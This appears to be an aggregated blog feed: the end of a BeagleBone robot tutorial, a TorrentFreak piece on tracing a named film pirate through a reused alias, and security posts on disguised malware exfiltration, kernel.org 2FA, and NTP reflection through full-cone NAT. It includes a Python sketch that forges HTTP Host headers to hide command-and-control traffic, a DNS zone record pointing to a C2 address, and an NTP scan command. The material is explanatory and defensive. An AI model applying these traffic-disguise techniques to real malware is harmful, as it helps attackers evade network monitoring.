    <div class="col-md-1"><p class="lead">Speed</p></div>
    <div class="col-md-8"><input id="speed" data-slider-id='speedSlider' 
                    type="text" data-slider-min="0" data-slider-max="100" 
                    data-slider-step="1" data-slider-value="0"/></div>
  </div>
  <div class="row">
    <div class="col-md-1"><p class="lead">Heading</p></div>
    <div class="col-md-8"><input id="heading" data-slider-id='headingSlider' 
                    type="text" data-slider-min="0" data-slider-max="100" 
                    data-slider-step="1" data-slider-value="50"/></div>
  </div>
</div>
<div class="inner cover">
    <div class="btn-group">
	<button id="rotateleft" type="button" class="btn btn-default btn-lg" >
	  <span class="glyphicon glyphicon-hand-left"></span>&nbsp;Rot&nbsp;Left</button>
	<button id="straightahead" type="button" class="btn btn-default btn-lg" >
	  <span class="glyphicon glyphicon-arrow-up"></span>&nbsp;Straight&nbsp;ahead</button>
	<button id="rotateright" type="button" class="btn btn-default btn-lg" >
	  <span class="glyphicon glyphicon-hand-right"></span>&nbsp;Rot&nbsp;Right</button>
    </div>
</div>

With those UI elements in place, the hook-up to the server is completed using io.connect() to connect a ‘var socket’ back to the BeagleBone Black. The code below sends commands back to the BeagleBone Black as UI elements are adjusted on the page. The rotateleft command is simulated by setting the heading and speed for a few seconds and then stopping everything.

$("#speed").on('slide', function(slideEvt) {
    socket.emit('speed', {
        value: slideEvt.value[0],
        '/end': 'of-message'
    });
});
$('#straightahead').on('click', function (e) {
    socket.emit('heading', { value: 50 });
});
$('#rotateleft').on('click', function (e) {
    // steer hard over at a modest speed, then stop after a couple
    // of seconds, as described above
    socket.emit('heading', { value: 0 });
    socket.emit('speed',   { value: 50 });
    setTimeout(function() {
        socket.emit('stop', {});
    }, 2000);
});

The BeagleBone Black runs a Web server offering files from /usr/share/bone101. I found it convenient to put the whole project in /home/xuser/webapps/terry-tee and create a softlink to the project at /usr/share/bone101/terry-tee. This way http://mybeagleip/terry-tee/index.html will load the Web interface on a tablet. Cloud9 will automatically start any Bonescript files contained in /var/lib/cloud9/autorun. So two links set up Cloud9 to both serve the client and automatically start the server Bonescript for you:

root@beaglebone:/var/lib/cloud9/autorun# ls -l
lrwxrwxrwx 1 root root 39 Apr 23 07:02 terry.js -> /home/xuser/webapps/terry-tee/server.js
root@beaglebone:/var/lib/cloud9/autorun# cd /usr/share/bone101/
root@beaglebone:/usr/share/bone101# ls -l terry-tee
lrwxrwxrwx 1 root root 29 Apr 17 05:48 terry-tee -> /home/xuser/webapps/terry-tee

Wrap up

I originally tried to use the GPIO pins P8_41 to 44. I found that if I had wires connected to those ports the BeagleBone Black would not start. I could remove and reapply the wires after startup and things would function as expected. On the other hand, leaving 41-44 unconnected and using 37-40 instead, the BeagleBone Black booted up fine. If you have a problem starting your BeagleBone Black you might be accidentally using a connector that has a reserved function during startup.

While the configuration shown in this article allows control of only the movement of the robot base, the same code could easily be extended to control other aspects of the robot you are building – for example, controlling an attached arm so you can move things around from your tablet.

Using a BeagleBone Black to control the robot base gives the robot plenty of CPU performance. This opens the door to using a mounted camera with OpenCV to implement object tracking. For example, the robot can move itself around in order to keep facing you. While the configuration in this article used wifi to connect with the robot, another interesting possibility is to use 3G to connect to a robot that isn’t physically nearby.

The BeagleBone Black can create a great Web-controlled robot and the 3 wheel robot base together with some gearmotors should get you moving fairly easily. Though once you have the base moving around you may find it difficult to resist giving your robot more capabilities!

We would like to thank ServoCity for supplying the 3 wheel robot base, gearmotors, gearbox and servo used in this article.

TorrentFreak: No VPN on Earth Can Protect Careless Pirates

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Last year, Philip Danks, a man from the West Midlands, UK, went into a local cinema and managed to record the movie Fast and Furious 6. He later uploaded that content to the Internet.

After pleading guilty, this week Wolverhampton Crown Court sentenced him to an unprecedented 33 months in prison.

The Federation Against Copyright Theft are no doubt extremely pleased with this result. After their successful private prosecution, the Hollywood-affiliated anti-piracy group is now able to place Danks’ head on a metaphorical pike, a clear warning to other would-be cammers. But just how difficult was this operation?

There’s often a lot of mystery attached to the investigations process in a case like this. How are individuals like Danks tracked and found? Have FACT placed spies deep into file-sharing sites? Are the authorities sniffing traffic and breaking pirates’ VPN encryption?

Or are they spending half an hour with Google and getting most of it handed to them on a plate? In Danks’ case, that appears to be exactly what happened.

Something that many millions of people use online is a nickname, and Danks was no exception. His online alias in the torrenting scene was TheCod3r, and as shown below it is clearly visible in the release title.


The idea behind aliases is that they provide a way to mask a real name. Military uses aside, adopting an alternative communications identity was something popularized in the 70s with the advent of Citizens Band radio. The practice continues online today, with many people forced to adopt one to register with various services.

However, what many in the file-sharing scene forget is that while aliases on a torrent site might be useful, they become as identifying as a real name when used elsewhere in ‘regular’ life. The screenshot below shows one of Danks’ first huge mistakes.


Clicking that link on dating site Plenty of Fish (POF) reveals a whole range of information about a person who, at the very least, uses the same online nickname as Danks. There’s no conclusive proof that it’s the same person, but several pieces of information begin to build a picture.

In his POF profile, Danks reveals his city as being Willenhall, a small town situated in an area known locally as the Black Country. What FACT would’ve known soon after the movie leaked online was which cinema it had been recorded in. That turned out to be a Showcase cinema, just a few minutes up the road from Willenhall in the town of Walsall.

Also revealed on Danks’ POF profile is his full name and age. When you have that, plus a town, you can often find a person’s address on the UK’s Electoral Register.

It’s also trivial to find social networking pages. Not only do pictures on Danks’ POF profile match those on his Facebook page, he also has a revealing movie item listed in his interests section.


Of course, none of this in itself is enough to build a decent case, but when you have the police on board as FACT did, things can be sped up somewhat. On May 23, 2013 Danks was raided and then, just two days later, he did something quite astonishing.

The then 24-year-old took to one of his Facebook accounts (he has two) to mock the makers of Fast and Furious 6.

“Seven billion people and I was the first. F*** you Universal Pictures,” he wrote.

Also amazing was Danks’ apparent disregard for the predicament he was in. On May 10, 2013, Danks again took to Facebook, this time to advertise that he was selling copies of movies including Robocop and Captain America.


This continued distribution of copyrighted material particularly aggravated the Court at his sentencing hearing this week, with Danks’ behavior being described as “bold, arrogant and cocksure offending.”

While the list of events above clearly shows a catalog of errors that some might even find amusing, reusing the same nickname across many sites is a common habit, shared even by some of the biggest players in the game.

Once these and other similar indicators migrate across into real-life identities and activities (and the ever-present Facebook account, of course), joining the dots is not difficult, especially for the police and outfits like FACT. And once that happens, no amount of VPN encryption or no-logging policies is going to put the genie back in the bottle.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Schneier on Security: Disguising Exfiltrated Data

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

There’s an interesting article on a data exfiltration technique.

What was unique about the attackers was how they disguised traffic between the malware and command-and-control servers using Google Developers and the public Domain Name System (DNS) service of Hurricane Electric, based in Fremont, Calif.

In both cases, the services were used as a kind of switching station to redirect traffic that appeared to be headed toward a range of legitimate domains.


The malware disguised its traffic by including forged HTTP headers of legitimate domains. FireEye identified 21 legitimate domain names used by the attackers.
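To make the header-forging trick concrete, here is a minimal Python sketch (all addresses, paths, and domain names below are invented for illustration): a request whose bytes are destined for one IP address, while the headers name an unrelated, legitimate-looking domain.

```python
# Sketch: why forged HTTP Host headers defeat naive traffic inspection.
# The request below would be sent to an arbitrary C2 address, but a
# middlebox reading only the headers sees a well-known domain name.
C2_IP = "203.0.113.10"           # where the bytes actually go (example address)
FORGED_HOST = "www.example.com"  # what the headers claim

request = (
    f"GET /update HTTP/1.1\r\n"
    f"Host: {FORGED_HOST}\r\n"
    f"User-Agent: Mozilla/5.0\r\n"
    f"Connection: close\r\n"
    f"\r\n"
).encode("ascii")

# A monitor that trusts the Host header would log this as traffic to
# www.example.com, not to 203.0.113.10.
print(request.decode().splitlines()[1])  # -> Host: www.example.com
```

A log pipeline keyed on Host (or on forged SNI, in the TLS case) attributes the flow to the wrong destination, which is exactly the disguise FireEye describes.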

In addition, the attackers signed the Kaba malware with a legitimate certificate from a group listed as the “Police Mutual Aid Association” and with an expired certificate from an organization called “MOCOMSYS INC.”

In the case of Google Developers, the attackers used the service to host code that decoded the malware traffic to determine the IP address of the real destination and redirect the traffic to that location.

Google Developers, formerly called Google Code, is the search engine’s website for software development tools, APIs, and documentation on working with Google developer products. Developers can also use the site to share code.

With Hurricane Electric, the attackers took advantage of the fact that its domain name servers were configured so that anyone could register for a free account with the company’s hosted DNS service.

The service allowed anyone to register a DNS zone, which is a distinct, contiguous portion of the domain name space in the DNS. The registrant could then create A records for the zone and point them to any IP address.
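As an illustration only, a hypothetical BIND-style zone registered through such a hosted-DNS account might look like this, with the A record pointed wherever the registrant likes (every name and address below is invented):

```
; Hypothetical zone in a free hosted-DNS account.
; The registrant controls all records and can point them at any IP.
$ORIGIN attacker-zone.example.
$TTL 300
@    IN  SOA  ns1.attacker-zone.example. admin.attacker-zone.example. (
                2014081701 3600 600 86400 300 )
     IN  NS   ns1.attacker-zone.example.
c2   IN  A    203.0.113.45   ; the real command-and-control address
```

Nothing here is abnormal DNS; the abuse is purely in who controls the records and what resolves to them.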

Honestly, this looks like a government exfiltration technique, although it could be evidence that the criminals are getting even more sophisticated.

Linux Kernel Git Repositories Add 2-Factor Authentication

This post was syndicated from: and was written by: ris. Original post: at

The post takes a look at using 2-factor authentication for commit access to kernel git repositories. “Having the technology available is one thing, but how to incorporate it into the kernel development process — in a way that doesn’t make developers’ lives painful and unbearable? When we asked them, it became abundantly clear that nobody wanted to type in 6-digit codes every time they needed to do a git remote operation. Where do you draw the line between security and usability in this case?

We looked at the options available in gitolite, the git repository management solution used at, and found a way that allowed us to trigger additional checks only when someone performed a write operation, such as “git push.” Since we already knew the username and the remote IP address of the developer attempting to perform a write operation, we put together a verification tool that allowed developers to temporarily whitelist their IP addresses using their 2-factor authentication token.”
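The idea in the quote can be sketched in a few lines of stdlib-only Python. This is not the actual gitolite hook or kernel.org tooling; the whitelist TTL, data structures, and function names are all assumptions. It pairs a standard RFC 6238 TOTP check with a (user, IP) whitelist so that only the first push from a new address prompts for a token.

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32, t=None, step=30, digits=6):
    """RFC 6238 TOTP: HMAC-SHA1 over the current 30-second counter."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int((time.time() if t is None else t) // step)
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = (struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return str(code).zfill(digits)

# In-memory whitelist: (username, ip) -> expiry timestamp (assumed TTL).
WHITELIST = {}
TTL = 8 * 3600

def allow_push(user, ip, token, secret_b32, now=None):
    """Gatekeeper a pre-receive hook could call: pass if the (user, IP)
    pair is already whitelisted, otherwise require a valid 2FA token."""
    now = time.time() if now is None else now
    if WHITELIST.get((user, ip), 0) > now:
        return True  # write allowed without re-prompting
    if token is not None and hmac.compare_digest(token, totp(secret_b32, now)):
        WHITELIST[(user, ip)] = now + TTL  # remember this address
        return True
    return False
```

The key property is the one the article highlights: read operations never hit this check, and a developer types a 6-digit code at most once per address per TTL window rather than on every `git push`.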

SANS Internet Storm Center, InfoCON: green: Part 2: Is your home network unwittingly contributing to NTP DDOS attacks?, (Sun, Aug 17th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

This diary follows from Part 1, published on Sunday August 17, 2014.  

How is it possible that, with no port forwarding enabled through the firewall, Internet-originated NTP requests were getting past the firewall to the misconfigured NTP server?

The reason why these packets are passing the firewall is because the manufacturer of the gateway router, in this case Pace, implemented full-cone NAT as an alternative to UPnP.

What is full-cone NAT?

The secret is in these settings in the gateway router:

If strict UDP Session Control were enabled, the firewall would treat outbound UDP transactions as described earlier: when a device on your network initiates an outbound connection to a server, responses from that server are permitted back into your network. Since UDP is stateless, most firewalls simulate state with a timeout. In other words, if no traffic is seen between the device and the server for 600 seconds, no response from the server is permitted until there is new outbound traffic. But any time related traffic is seen on the correct port, the timer is reset to 600 seconds, so the communication can continue virtually forever as long as one or both devices keep talking. Visually that looks like:

However if UDP Session Control is disabled, as it is in this device, then this device implements full-cone NAT (RFC 3489). Full-cone NAT allows any external host to use the inbound window opened by the outbound traffic until the timer expires.  

Remember anytime traffic is seen on the correct port the timer is reset to 600 seconds, thus making it possible for this communication to be able to continue virtually forever as long as one or both devices continue to communicate.
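The difference between the two behaviours can be modelled in a few lines. This toy Python simulation (not real firewall code; times are plain numbers so the steps are easy to follow) tracks one UDP mapping with a 600-second timer; the only difference between the modes is whether a packet from a third-party host is accepted and allowed to reset the timer.

```python
TIMEOUT = 600  # seconds, as in the Pace gateway example

class Nat:
    def __init__(self, full_cone):
        self.full_cone = full_cone
        self.map = {}  # ext_port -> (internal_host, original_peer, expiry)

    def outbound(self, ext_port, internal, remote, now):
        """An internal host sends a UDP packet out: open/refresh the mapping."""
        self.map[ext_port] = (internal, remote, now + TIMEOUT)

    def inbound(self, ext_port, sender, now):
        """Does a packet from `sender` get through? Refresh the timer if so."""
        entry = self.map.get(ext_port)
        if entry is None:
            return False
        internal, remote, expiry = entry
        if now >= expiry:
            return False  # window closed
        if not self.full_cone and sender != remote:
            return False  # strict mode: only the original peer may reply
        self.map[ext_port] = (internal, remote, now + TIMEOUT)  # reset timer
        return True
```

With `full_cone=True`, any host that learns the external port can hold the window open indefinitely by sending a packet at least every 600 seconds, which is exactly the reflector exposure described below.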

The really quick among you will have realized that this is not normally a big problem since the only port exposed is the original ephemeral source port and it is waiting for a NTP reply.  It is not likely to be used as an NTP reflector.  But the design of the NTP protocol can contribute to this problem.

Symmetric Mode NTP

There is a mode of NTP called symmetric NTP in which, instead of the originating device picking an ephemeral source port for the outbound connection, both source and destination use port 123. The traffic flow would look like:

Symmetric NTP opens up the misconfigured server to be an NTP reflector.  Assuming there is an NTP server running on the originating machine on UDP port 123, if an attacker can find this open NTP port before the timeout window closes they can send in NTP queries which will pass the firewall and will be answered by the NTP server.  If the source IP address is spoofed the replies will not go back to the attacker, but will go to a victim instead. 
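For the curious, here is a small stdlib-only Python sketch of the packet-level difference (the actual send is shown only in a comment, so nothing touches the network). The NTP mode lives in the low three bits of the first header byte; symmetric-active mode pairs it with a bound source port of 123.

```python
import struct

def ntp_first_byte(version, mode):
    """LI (2 bits) | VN (3 bits) | Mode (3 bits); LI = 0 here."""
    return (version << 3) | mode

MODE_SYMMETRIC_ACTIVE = 1  # both peers use port 123
MODE_CLIENT = 3            # a client normally uses an ephemeral source port

def make_ntp_packet(mode, version=4):
    """Minimal 48-byte NTP header with everything but the first byte zeroed."""
    return struct.pack("!B", ntp_first_byte(version, mode)) + b"\x00" * 47

client_pkt = make_ntp_packet(MODE_CLIENT)          # first byte 0x23
peer_pkt = make_ntp_packet(MODE_SYMMETRIC_ACTIVE)  # first byte 0x21

# In symmetric mode a host would also bind local port 123 before sending,
# e.g. sock.bind(("", 123)); sock.sendto(peer_pkt, (peer_ip, 123)),
# so the firewall's inbound window is the well-known NTP port rather than
# an ephemeral one -- exactly the exposure described above.
```

That well-known port is what lets an attacker scanning for UDP 123 find and abuse the window before it times out.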

Of course, UDP is stateless, so the source IP can be spoofed and there is no way for the receiver of the NTP request to validate the source IP or source port, permitting the attacker to direct the attack against any IP and port on the Internet. It is exceedingly difficult to trace these attacks back to the source, so the misconfigured server behind the full-cone NAT will get the blame. As long as the attacker sends at least one packet every 600 seconds he can hold the session open virtually forever and use this device to wreak havoc on unsuspecting victims. We have seen indications of attackers holding these communications open for months.

What are the lessons to be learned here:

  • If all ISPs fully implemented anti-spoofing filters, the likelihood of this sort of attack would be lowered substantially.  In a nutshell, anti-spoofing says that if traffic is headed into my network and the source IP address is from my network, then the source IP must be spoofed, so drop the packet.  It also works in reverse: if a packet is leaving my network and the source IP address is not an IP address from my network, then the source IP address must be spoofed, so drop the packet.
  • It can’t hurt to check your network for NTP servers.  A single nmap command will quickly confirm whether any are open on your network: nmap -sU -A -n -Pn -pU:123 --script=ntp-monlist <target>.  If you find one or more, perhaps you can contact the vendor for a possible resolution.
  • If you own a gateway router that implements full-cone NAT, you may want to see if it offers the equivalent of the Pace “Strict UDP Session Control”.  This will prevent an attacker from accessing misconfigured UDP servers on your network.
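The anti-spoofing rule in the first bullet above (essentially BCP 38 ingress/egress filtering) reduces to two symmetric checks. A minimal Python sketch using an example customer prefix:

```python
import ipaddress

# Example prefix for "my network"; a real filter would use the ISP's
# actual customer allocations.
MY_NET = ipaddress.ip_network("198.51.100.0/24")

def drop_ingress(src_ip):
    """Packet arriving FROM the Internet: a source address inside my
    own network must be spoofed, so drop it."""
    return ipaddress.ip_address(src_ip) in MY_NET

def drop_egress(src_ip):
    """Packet leaving my network: a source address NOT inside my
    network must be spoofed, so drop it."""
    return ipaddress.ip_address(src_ip) not in MY_NET
```

The egress check is the one that matters here: if the home user's ISP dropped outbound packets with foreign source addresses, the spoofed NTP queries driving the reflection attack would never leave the attacker's network.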

– Rick Wanner – rwanner at isc dot sans dot edu – Twitter: namedeplume (Protected)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.